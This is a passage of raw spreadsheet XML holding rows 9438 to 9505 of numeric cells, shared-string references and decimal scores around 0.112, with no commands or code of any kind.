      </c>
      <c r="D9438" s="2">
        <v>1.0</v>
      </c>
      <c r="E9438" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9438" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9439" ht="15.75" customHeight="1">
      <c r="A9439" s="1">
        <v>17865.0</v>
      </c>
      <c r="B9439" s="2">
        <v>5.1016966E7</v>
      </c>
      <c r="C9439" s="2" t="s">
        <v>9012</v>
      </c>
      <c r="D9439" s="2">
        <v>1.0</v>
      </c>
      <c r="E9439" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9439" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9440" ht="15.75" customHeight="1">
      <c r="A9440" s="1">
        <v>17883.0</v>
      </c>
      <c r="B9440" s="2">
        <v>5.104359E7</v>
      </c>
      <c r="C9440" s="2" t="s">
        <v>9013</v>
      </c>
      <c r="D9440" s="2">
        <v>1.0</v>
      </c>
      <c r="E9440" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9440" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9441" ht="15.75" customHeight="1">
      <c r="A9441" s="1">
        <v>17953.0</v>
      </c>
      <c r="B9441" s="2">
        <v>5.1281201E7</v>
      </c>
      <c r="C9441" s="2" t="s">
        <v>9014</v>
      </c>
      <c r="D9441" s="2">
        <v>1.0</v>
      </c>
      <c r="E9441" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9441" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9442" ht="15.75" customHeight="1">
      <c r="A9442" s="1">
        <v>18077.0</v>
      </c>
      <c r="B9442" s="2">
        <v>5.1622917E7</v>
      </c>
      <c r="C9442" s="2" t="s">
        <v>9015</v>
      </c>
      <c r="D9442" s="2">
        <v>1.0</v>
      </c>
      <c r="E9442" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9442" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9443" ht="15.75" customHeight="1">
      <c r="A9443" s="1">
        <v>18308.0</v>
      </c>
      <c r="B9443" s="2">
        <v>5.2371982E7</v>
      </c>
      <c r="C9443" s="2" t="s">
        <v>9016</v>
      </c>
      <c r="D9443" s="2">
        <v>1.0</v>
      </c>
      <c r="E9443" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9443" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9444" ht="15.75" customHeight="1">
      <c r="A9444" s="1">
        <v>18315.0</v>
      </c>
      <c r="B9444" s="2">
        <v>5.2377919E7</v>
      </c>
      <c r="C9444" s="2" t="s">
        <v>9017</v>
      </c>
      <c r="D9444" s="2">
        <v>1.0</v>
      </c>
      <c r="E9444" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9444" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9445" ht="15.75" customHeight="1">
      <c r="A9445" s="1">
        <v>18517.0</v>
      </c>
      <c r="B9445" s="2">
        <v>5.3003015E7</v>
      </c>
      <c r="C9445" s="2" t="s">
        <v>9018</v>
      </c>
      <c r="D9445" s="2">
        <v>1.0</v>
      </c>
      <c r="E9445" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9445" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9446" ht="15.75" customHeight="1">
      <c r="A9446" s="1">
        <v>18582.0</v>
      </c>
      <c r="B9446" s="2">
        <v>5.324711E7</v>
      </c>
      <c r="C9446" s="2" t="s">
        <v>9019</v>
      </c>
      <c r="D9446" s="2">
        <v>1.0</v>
      </c>
      <c r="E9446" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9446" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9447" ht="15.75" customHeight="1">
      <c r="A9447" s="1">
        <v>18681.0</v>
      </c>
      <c r="B9447" s="2">
        <v>5.3579174E7</v>
      </c>
      <c r="C9447" s="2" t="s">
        <v>9020</v>
      </c>
      <c r="D9447" s="2">
        <v>1.0</v>
      </c>
      <c r="E9447" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9447" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9448" ht="15.75" customHeight="1">
      <c r="A9448" s="1">
        <v>18690.0</v>
      </c>
      <c r="B9448" s="2">
        <v>5.3599456E7</v>
      </c>
      <c r="C9448" s="2" t="s">
        <v>9021</v>
      </c>
      <c r="D9448" s="2">
        <v>1.0</v>
      </c>
      <c r="E9448" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9448" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9449" ht="15.75" customHeight="1">
      <c r="A9449" s="1">
        <v>19127.0</v>
      </c>
      <c r="B9449" s="2">
        <v>5.4763577E7</v>
      </c>
      <c r="C9449" s="2" t="s">
        <v>9022</v>
      </c>
      <c r="D9449" s="2">
        <v>1.0</v>
      </c>
      <c r="E9449" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9449" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9450" ht="15.75" customHeight="1">
      <c r="A9450" s="1">
        <v>19242.0</v>
      </c>
      <c r="B9450" s="2">
        <v>5.5081463E7</v>
      </c>
      <c r="C9450" s="2" t="s">
        <v>9023</v>
      </c>
      <c r="D9450" s="2">
        <v>1.0</v>
      </c>
      <c r="E9450" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9450" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9451" ht="15.75" customHeight="1">
      <c r="A9451" s="1">
        <v>19671.0</v>
      </c>
      <c r="B9451" s="2">
        <v>5.6388719E7</v>
      </c>
      <c r="C9451" s="2" t="s">
        <v>9024</v>
      </c>
      <c r="D9451" s="2">
        <v>1.0</v>
      </c>
      <c r="E9451" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9451" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9452" ht="15.75" customHeight="1">
      <c r="A9452" s="1">
        <v>19954.0</v>
      </c>
      <c r="B9452" s="2">
        <v>5.7527803E7</v>
      </c>
      <c r="C9452" s="2" t="s">
        <v>9025</v>
      </c>
      <c r="D9452" s="2">
        <v>1.0</v>
      </c>
      <c r="E9452" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9452" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9453" ht="15.75" customHeight="1">
      <c r="A9453" s="1">
        <v>20045.0</v>
      </c>
      <c r="B9453" s="2">
        <v>7884381.0</v>
      </c>
      <c r="C9453" s="2" t="s">
        <v>9026</v>
      </c>
      <c r="D9453" s="2">
        <v>1.0</v>
      </c>
      <c r="E9453" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9453" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9454" ht="15.75" customHeight="1">
      <c r="A9454" s="1">
        <v>20105.0</v>
      </c>
      <c r="B9454" s="2">
        <v>9823661.0</v>
      </c>
      <c r="C9454" s="2" t="s">
        <v>9027</v>
      </c>
      <c r="D9454" s="2">
        <v>1.0</v>
      </c>
      <c r="E9454" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9454" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9455" ht="15.75" customHeight="1">
      <c r="A9455" s="1">
        <v>20276.0</v>
      </c>
      <c r="B9455" s="2">
        <v>1.1151496E7</v>
      </c>
      <c r="C9455" s="2" t="s">
        <v>9028</v>
      </c>
      <c r="D9455" s="2">
        <v>1.0</v>
      </c>
      <c r="E9455" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9455" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9456" ht="15.75" customHeight="1">
      <c r="A9456" s="1">
        <v>20959.0</v>
      </c>
      <c r="B9456" s="2">
        <v>1.666653E7</v>
      </c>
      <c r="C9456" s="2" t="s">
        <v>9029</v>
      </c>
      <c r="D9456" s="2">
        <v>1.0</v>
      </c>
      <c r="E9456" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9456" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9457" ht="15.75" customHeight="1">
      <c r="A9457" s="1">
        <v>21262.0</v>
      </c>
      <c r="B9457" s="2">
        <v>2.0045054E7</v>
      </c>
      <c r="C9457" s="2" t="s">
        <v>9030</v>
      </c>
      <c r="D9457" s="2">
        <v>1.0</v>
      </c>
      <c r="E9457" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9457" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9458" ht="15.75" customHeight="1">
      <c r="A9458" s="1">
        <v>22150.0</v>
      </c>
      <c r="B9458" s="2">
        <v>3.1273854E7</v>
      </c>
      <c r="C9458" s="2" t="s">
        <v>9031</v>
      </c>
      <c r="D9458" s="2">
        <v>1.0</v>
      </c>
      <c r="E9458" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9458" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9459" ht="15.75" customHeight="1">
      <c r="A9459" s="1">
        <v>22246.0</v>
      </c>
      <c r="B9459" s="2">
        <v>3.2761844E7</v>
      </c>
      <c r="C9459" s="2" t="s">
        <v>9032</v>
      </c>
      <c r="D9459" s="2">
        <v>1.0</v>
      </c>
      <c r="E9459" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9459" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9460" ht="15.75" customHeight="1">
      <c r="A9460" s="1">
        <v>22377.0</v>
      </c>
      <c r="B9460" s="2">
        <v>3.5061454E7</v>
      </c>
      <c r="C9460" s="2" t="s">
        <v>9033</v>
      </c>
      <c r="D9460" s="2">
        <v>1.0</v>
      </c>
      <c r="E9460" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9460" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9461" ht="15.75" customHeight="1">
      <c r="A9461" s="1">
        <v>22960.0</v>
      </c>
      <c r="B9461" s="2">
        <v>4913376.0</v>
      </c>
      <c r="C9461" s="2" t="s">
        <v>9034</v>
      </c>
      <c r="D9461" s="2">
        <v>1.0</v>
      </c>
      <c r="E9461" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9461" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9462" ht="15.75" customHeight="1">
      <c r="A9462" s="1">
        <v>23101.0</v>
      </c>
      <c r="B9462" s="2">
        <v>5.0850028E7</v>
      </c>
      <c r="C9462" s="2" t="s">
        <v>9035</v>
      </c>
      <c r="D9462" s="2">
        <v>1.0</v>
      </c>
      <c r="E9462" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9462" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9463" ht="15.75" customHeight="1">
      <c r="A9463" s="1">
        <v>23150.0</v>
      </c>
      <c r="B9463" s="2">
        <v>5179869.0</v>
      </c>
      <c r="C9463" s="2" t="s">
        <v>9036</v>
      </c>
      <c r="D9463" s="2">
        <v>1.0</v>
      </c>
      <c r="E9463" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9463" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9464" ht="15.75" customHeight="1">
      <c r="A9464" s="1">
        <v>24373.0</v>
      </c>
      <c r="B9464" s="2">
        <v>1.0762641E7</v>
      </c>
      <c r="C9464" s="2" t="s">
        <v>9037</v>
      </c>
      <c r="D9464" s="2">
        <v>1.0</v>
      </c>
      <c r="E9464" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9464" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9465" ht="15.75" customHeight="1">
      <c r="A9465" s="1">
        <v>24470.0</v>
      </c>
      <c r="B9465" s="2">
        <v>1.0982355E7</v>
      </c>
      <c r="C9465" s="2" t="s">
        <v>9038</v>
      </c>
      <c r="D9465" s="2">
        <v>1.0</v>
      </c>
      <c r="E9465" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9465" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9466" ht="15.75" customHeight="1">
      <c r="A9466" s="1">
        <v>24670.0</v>
      </c>
      <c r="B9466" s="2">
        <v>1.1577197E7</v>
      </c>
      <c r="C9466" s="2" t="s">
        <v>9039</v>
      </c>
      <c r="D9466" s="2">
        <v>1.0</v>
      </c>
      <c r="E9466" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9466" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9467" ht="15.75" customHeight="1">
      <c r="A9467" s="1">
        <v>25471.0</v>
      </c>
      <c r="B9467" s="2">
        <v>1.4006083E7</v>
      </c>
      <c r="C9467" s="2" t="s">
        <v>9040</v>
      </c>
      <c r="D9467" s="2">
        <v>1.0</v>
      </c>
      <c r="E9467" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9467" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9468" ht="15.75" customHeight="1">
      <c r="A9468" s="1">
        <v>26118.0</v>
      </c>
      <c r="B9468" s="2">
        <v>1.5871236E7</v>
      </c>
      <c r="C9468" s="2" t="s">
        <v>9041</v>
      </c>
      <c r="D9468" s="2">
        <v>1.0</v>
      </c>
      <c r="E9468" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9468" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9469" ht="15.75" customHeight="1">
      <c r="A9469" s="1">
        <v>26200.0</v>
      </c>
      <c r="B9469" s="2">
        <v>1.6237407E7</v>
      </c>
      <c r="C9469" s="2" t="s">
        <v>9042</v>
      </c>
      <c r="D9469" s="2">
        <v>1.0</v>
      </c>
      <c r="E9469" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9469" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9470" ht="15.75" customHeight="1">
      <c r="A9470" s="1">
        <v>26385.0</v>
      </c>
      <c r="B9470" s="2">
        <v>1.6999988E7</v>
      </c>
      <c r="C9470" s="2" t="s">
        <v>9043</v>
      </c>
      <c r="D9470" s="2">
        <v>1.0</v>
      </c>
      <c r="E9470" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9470" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9471" ht="15.75" customHeight="1">
      <c r="A9471" s="1">
        <v>28240.0</v>
      </c>
      <c r="B9471" s="2">
        <v>2.5226602E7</v>
      </c>
      <c r="C9471" s="2" t="s">
        <v>9044</v>
      </c>
      <c r="D9471" s="2">
        <v>1.0</v>
      </c>
      <c r="E9471" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9471" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9472" ht="15.75" customHeight="1">
      <c r="A9472" s="1">
        <v>28628.0</v>
      </c>
      <c r="B9472" s="2">
        <v>2.71738E7</v>
      </c>
      <c r="C9472" s="2" t="s">
        <v>9045</v>
      </c>
      <c r="D9472" s="2">
        <v>1.0</v>
      </c>
      <c r="E9472" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9472" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9473" ht="15.75" customHeight="1">
      <c r="A9473" s="1">
        <v>31050.0</v>
      </c>
      <c r="B9473" s="2">
        <v>4.7946171E7</v>
      </c>
      <c r="C9473" s="2" t="s">
        <v>9046</v>
      </c>
      <c r="D9473" s="2">
        <v>1.0</v>
      </c>
      <c r="E9473" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9473" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9474" ht="15.75" customHeight="1">
      <c r="A9474" s="1">
        <v>31160.0</v>
      </c>
      <c r="B9474" s="2">
        <v>4902066.0</v>
      </c>
      <c r="C9474" s="2" t="s">
        <v>9047</v>
      </c>
      <c r="D9474" s="2">
        <v>1.0</v>
      </c>
      <c r="E9474" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9474" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9475" ht="15.75" customHeight="1">
      <c r="A9475" s="1">
        <v>31184.0</v>
      </c>
      <c r="B9475" s="2">
        <v>4913375.0</v>
      </c>
      <c r="C9475" s="2" t="s">
        <v>9034</v>
      </c>
      <c r="D9475" s="2">
        <v>1.0</v>
      </c>
      <c r="E9475" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9475" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9476" ht="15.75" customHeight="1">
      <c r="A9476" s="1">
        <v>31663.0</v>
      </c>
      <c r="B9476" s="2">
        <v>5.1755636E7</v>
      </c>
      <c r="C9476" s="2" t="s">
        <v>9048</v>
      </c>
      <c r="D9476" s="2">
        <v>1.0</v>
      </c>
      <c r="E9476" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9476" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9477" ht="15.75" customHeight="1">
      <c r="A9477" s="1">
        <v>31789.0</v>
      </c>
      <c r="B9477" s="2">
        <v>5234897.0</v>
      </c>
      <c r="C9477" s="2" t="s">
        <v>9049</v>
      </c>
      <c r="D9477" s="2">
        <v>1.0</v>
      </c>
      <c r="E9477" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9477" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9478" ht="15.75" customHeight="1">
      <c r="A9478" s="1">
        <v>32188.0</v>
      </c>
      <c r="B9478" s="2">
        <v>5472520.0</v>
      </c>
      <c r="C9478" s="2" t="s">
        <v>9050</v>
      </c>
      <c r="D9478" s="2">
        <v>1.0</v>
      </c>
      <c r="E9478" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9478" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9479" ht="15.75" customHeight="1">
      <c r="A9479" s="1">
        <v>32204.0</v>
      </c>
      <c r="B9479" s="2">
        <v>5479895.0</v>
      </c>
      <c r="C9479" s="2" t="s">
        <v>9051</v>
      </c>
      <c r="D9479" s="2">
        <v>1.0</v>
      </c>
      <c r="E9479" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9479" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9480" ht="15.75" customHeight="1">
      <c r="A9480" s="1">
        <v>32299.0</v>
      </c>
      <c r="B9480" s="2">
        <v>5553049.0</v>
      </c>
      <c r="C9480" s="2" t="s">
        <v>9052</v>
      </c>
      <c r="D9480" s="2">
        <v>1.0</v>
      </c>
      <c r="E9480" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9480" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9481" ht="15.75" customHeight="1">
      <c r="A9481" s="1">
        <v>32839.0</v>
      </c>
      <c r="B9481" s="2">
        <v>6242244.0</v>
      </c>
      <c r="C9481" s="2" t="s">
        <v>9053</v>
      </c>
      <c r="D9481" s="2">
        <v>1.0</v>
      </c>
      <c r="E9481" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9481" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9482" ht="15.75" customHeight="1">
      <c r="A9482" s="1">
        <v>32887.0</v>
      </c>
      <c r="B9482" s="2">
        <v>6356526.0</v>
      </c>
      <c r="C9482" s="2" t="s">
        <v>9054</v>
      </c>
      <c r="D9482" s="2">
        <v>1.0</v>
      </c>
      <c r="E9482" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9482" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9483" ht="15.75" customHeight="1">
      <c r="A9483" s="1">
        <v>33020.0</v>
      </c>
      <c r="B9483" s="2">
        <v>6669403.0</v>
      </c>
      <c r="C9483" s="2" t="s">
        <v>9055</v>
      </c>
      <c r="D9483" s="2">
        <v>1.0</v>
      </c>
      <c r="E9483" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9483" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9484" ht="15.75" customHeight="1">
      <c r="A9484" s="1">
        <v>33623.0</v>
      </c>
      <c r="B9484" s="2">
        <v>8353601.0</v>
      </c>
      <c r="C9484" s="2" t="s">
        <v>9034</v>
      </c>
      <c r="D9484" s="2">
        <v>1.0</v>
      </c>
      <c r="E9484" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9484" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9485" ht="15.75" customHeight="1">
      <c r="A9485" s="1">
        <v>33687.0</v>
      </c>
      <c r="B9485" s="2">
        <v>8445054.0</v>
      </c>
      <c r="C9485" s="2" t="s">
        <v>9056</v>
      </c>
      <c r="D9485" s="2">
        <v>1.0</v>
      </c>
      <c r="E9485" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9485" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="9486" ht="15.75" customHeight="1">
      <c r="A9486" s="1">
        <v>595.0</v>
      </c>
      <c r="B9486" s="2">
        <v>1.9212048E7</v>
      </c>
      <c r="C9486" s="2" t="s">
        <v>9057</v>
      </c>
      <c r="D9486" s="2">
        <v>1.0</v>
      </c>
      <c r="E9486" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9486" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="9487" ht="15.75" customHeight="1">
      <c r="A9487" s="1">
        <v>1170.0</v>
      </c>
      <c r="B9487" s="2">
        <v>2.4603504E7</v>
      </c>
      <c r="C9487" s="2" t="s">
        <v>9058</v>
      </c>
      <c r="D9487" s="2">
        <v>1.0</v>
      </c>
      <c r="E9487" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9487" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="9488" ht="15.75" customHeight="1">
      <c r="A9488" s="1">
        <v>2261.0</v>
      </c>
      <c r="B9488" s="2">
        <v>3.2406509E7</v>
      </c>
      <c r="C9488" s="2" t="s">
        <v>9059</v>
      </c>
      <c r="D9488" s="2">
        <v>1.0</v>
      </c>
      <c r="E9488" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9488" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="9489" ht="15.75" customHeight="1">
      <c r="A9489" s="1">
        <v>2298.0</v>
      </c>
      <c r="B9489" s="2">
        <v>3.2663415E7</v>
      </c>
      <c r="C9489" s="2" t="s">
        <v>9060</v>
      </c>
      <c r="D9489" s="2">
        <v>1.0</v>
      </c>
      <c r="E9489" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9489" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="9490" ht="15.75" customHeight="1">
      <c r="A9490" s="1">
        <v>3040.0</v>
      </c>
      <c r="B9490" s="2">
        <v>3.648619E7</v>
      </c>
      <c r="C9490" s="2" t="s">
        <v>9061</v>
      </c>
      <c r="D9490" s="2">
        <v>1.0</v>
      </c>
      <c r="E9490" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9490" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="9491" ht="15.75" customHeight="1">
      <c r="A9491" s="1">
        <v>6981.0</v>
      </c>
      <c r="B9491" s="2">
        <v>5.0030166E7</v>
      </c>
      <c r="C9491" s="2" t="s">
        <v>9062</v>
      </c>
      <c r="D9491" s="2">
        <v>1.0</v>
      </c>
      <c r="E9491" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9491" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="9492" ht="15.75" customHeight="1">
      <c r="A9492" s="1">
        <v>7807.0</v>
      </c>
      <c r="B9492" s="2">
        <v>5.22367E7</v>
      </c>
      <c r="C9492" s="2" t="s">
        <v>9063</v>
      </c>
      <c r="D9492" s="2">
        <v>1.0</v>
      </c>
      <c r="E9492" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9492" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="9493" ht="15.75" customHeight="1">
      <c r="A9493" s="1">
        <v>8995.0</v>
      </c>
      <c r="B9493" s="2">
        <v>5.4966358E7</v>
      </c>
      <c r="C9493" s="2" t="s">
        <v>9064</v>
      </c>
      <c r="D9493" s="2">
        <v>1.0</v>
      </c>
      <c r="E9493" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9493" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="9494" ht="15.75" customHeight="1">
      <c r="A9494" s="1">
        <v>9217.0</v>
      </c>
      <c r="B9494" s="2">
        <v>5.5429238E7</v>
      </c>
      <c r="C9494" s="2" t="s">
        <v>9065</v>
      </c>
      <c r="D9494" s="2">
        <v>1.0</v>
      </c>
      <c r="E9494" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9494" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="9495" ht="15.75" customHeight="1">
      <c r="A9495" s="1">
        <v>10246.0</v>
      </c>
      <c r="B9495" s="2">
        <v>5.7536768E7</v>
      </c>
      <c r="C9495" s="2" t="s">
        <v>9066</v>
      </c>
      <c r="D9495" s="2">
        <v>1.0</v>
      </c>
      <c r="E9495" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9495" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="9496" ht="15.75" customHeight="1">
      <c r="A9496" s="1">
        <v>11734.0</v>
      </c>
      <c r="B9496" s="2">
        <v>2.3991729E7</v>
      </c>
      <c r="C9496" s="2" t="s">
        <v>9067</v>
      </c>
      <c r="D9496" s="2">
        <v>1.0</v>
      </c>
      <c r="E9496" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9496" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="9497" ht="15.75" customHeight="1">
      <c r="A9497" s="1">
        <v>20668.0</v>
      </c>
      <c r="B9497" s="2">
        <v>1.4377182E7</v>
      </c>
      <c r="C9497" s="2" t="s">
        <v>9068</v>
      </c>
      <c r="D9497" s="2">
        <v>1.0</v>
      </c>
      <c r="E9497" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9497" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="9498" ht="15.75" customHeight="1">
      <c r="A9498" s="1">
        <v>28183.0</v>
      </c>
      <c r="B9498" s="2">
        <v>2.5006277E7</v>
      </c>
      <c r="C9498" s="2" t="s">
        <v>9069</v>
      </c>
      <c r="D9498" s="2">
        <v>1.0</v>
      </c>
      <c r="E9498" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9498" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="9499" ht="15.75" customHeight="1">
      <c r="A9499" s="1">
        <v>30389.0</v>
      </c>
      <c r="B9499" s="2">
        <v>3.8569441E7</v>
      </c>
      <c r="C9499" s="2" t="s">
        <v>9070</v>
      </c>
      <c r="D9499" s="2">
        <v>1.0</v>
      </c>
      <c r="E9499" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9499" s="2">
        <v>0.1121031746031746</v>
      </c>
    </row>
    <row r="9500" ht="15.75" customHeight="1">
      <c r="A9500" s="1">
        <v>1762.0</v>
      </c>
      <c r="B9500" s="2">
        <v>2.8930135E7</v>
      </c>
      <c r="C9500" s="2" t="s">
        <v>9071</v>
      </c>
      <c r="D9500" s="2">
        <v>1.0</v>
      </c>
      <c r="E9500" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9500" s="2">
        <v>0.1120857699805068</v>
      </c>
    </row>
    <row r="9501" ht="15.75" customHeight="1">
      <c r="A9501" s="1">
        <v>2781.0</v>
      </c>
      <c r="B9501" s="2">
        <v>3.5187423E7</v>
      </c>
      <c r="C9501" s="2" t="s">
        <v>9072</v>
      </c>
      <c r="D9501" s="2">
        <v>1.0</v>
      </c>
      <c r="E9501" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9501" s="2">
        <v>0.1120857699805068</v>
      </c>
    </row>
    <row r="9502" ht="15.75" customHeight="1">
      <c r="A9502" s="1">
        <v>4080.0</v>
      </c>
      <c r="B9502" s="2">
        <v>4.1187036E7</v>
      </c>
      <c r="C9502" s="2" t="s">
        <v>9073</v>
      </c>
      <c r="D9502" s="2">
        <v>1.0</v>
      </c>
      <c r="E9502" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9502" s="2">
        <v>0.1120857699805068</v>
      </c>
    </row>
    <row r="9503" ht="15.75" customHeight="1">
      <c r="A9503" s="1">
        <v>6105.0</v>
      </c>
      <c r="B9503" s="2">
        <v>4.7723174E7</v>
      </c>
      <c r="C9503" s="2" t="s">
        <v>9074</v>
      </c>
      <c r="D9503" s="2">
        <v>1.0</v>
      </c>
      <c r="E9503" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9503" s="2">
        <v>0.1120857699805068</v>
      </c>
    </row>
    <row r="9504" ht="15.75" customHeight="1">
      <c r="A9504" s="1">
        <v>8315.0</v>
      </c>
      <c r="B9504" s="2">
        <v>5.3622845E7</v>
      </c>
      <c r="C9504" s="2" t="s">
        <v>9075</v>
      </c>
      <c r="D9504" s="2">
        <v>1.0</v>
      </c>
      <c r="E9504" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9504" s="2">
        <v>0.1120857699805068</v>
      </c>
    </row>
    <row r="9505" ht="15.75" customHeight="1">
      <c r="A9505" s="1">
        <v>13047.0</v>
      </c>
      <c r="B9505" s="2">
        <v>3.3133345E7</v>
      </c>
      <c r="C9505" s="2" t="s">
        <v>9076</v>
      </c>
      <c r="D9505" s="2">
